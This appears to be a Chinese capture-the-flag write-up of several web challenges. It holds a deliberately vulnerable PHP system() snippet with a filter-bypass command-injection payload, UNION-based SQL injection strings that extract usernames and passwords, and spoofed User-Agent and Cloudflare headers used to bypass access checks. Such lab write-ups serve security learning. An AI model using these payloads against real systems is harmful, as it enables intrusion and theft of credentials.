emojictfweb
emojictfweb
RCE:
发现f12不能使用,没事,张师傅给我说ctrl+shift+i就可以了,ok.试了试发现没有有用的东西,dirsearch扫描一下发现robots.txt
然后发现 /fl@g.php,查看:
<?phphighlight_file(__FILE__);error_reporting(0);if(isset($_GET['emo'])){ $emo = $_GET['emo']; if(!preg_match("/\;|\"|\*| |[b-h]|[m-r]|\\$|\{|\}|\^|\>/i",$emo)){ system($emo); } else{ echo "Again"; }}else{ echo "Try";} |
先进行ls查看,发现flag.txt,然后emo=tail%09??a?.txt进行查看
http:
你的User-Agent必须被服务器识别为EMOJI_CTF_User_Agent_v1.0 只有使用正确的HTTP方法才能获取flag,不同的方法会得到不同的提示。 需要提供正确的自定义头部EMOJI-CTF-Auth且其值为’Passw0rd!’。 全部完成你就能获得flag!!!
在bp上面改然后在http方法上面进行爆破测试是什么方法,发现是PUT方法,然后访问fl1l1l1l1ag.php
e4_sql:
进行访问发现1”时候报错说明是字符形注入
1” order by 2#的时候和 3和4的时候不一样说明有俩列
-1” union select 1,2#发现2是回显位置
然后他没有过滤,直接注就行了
-1” union select 1,database()#
-1” union select 1,(select group_concat(username,password) from information)#
easy_web:
欢迎打开这个题目!
但是你的访问被拒绝了,因为我们采用了和知乎一样的反爬虫策略,而你的访问被认为是违规的爬虫了。
根据提示: User-Agent:Baiduspider
然后:欢迎来自垃圾百度的臭虫子!但是你爬不到什么了,因为本网站现在仅允许来自CloudFlare CDN的流量
那么CloudFlareCDN是什么,要特地提出来呢,不知道就去搜,Cloudflare HTTP 标头(Cloudflare HTTP 标头 ·Cloudflare 基础知识文档)
然后就随便尝试了一下
CF-Connecting-IP:1
CF-IPCountry:1
发现好吧,你来自cloudflare CDN了,但是为了安全,后面的机密内容只能通过洋葱访问(我是怎么知道你是否来自洋葱的呢?这也是CF悄悄告诉我的呀)!
然后去查了查:
CF-Connecting-IP:1
CF-IPCountry:T1
OK完事了。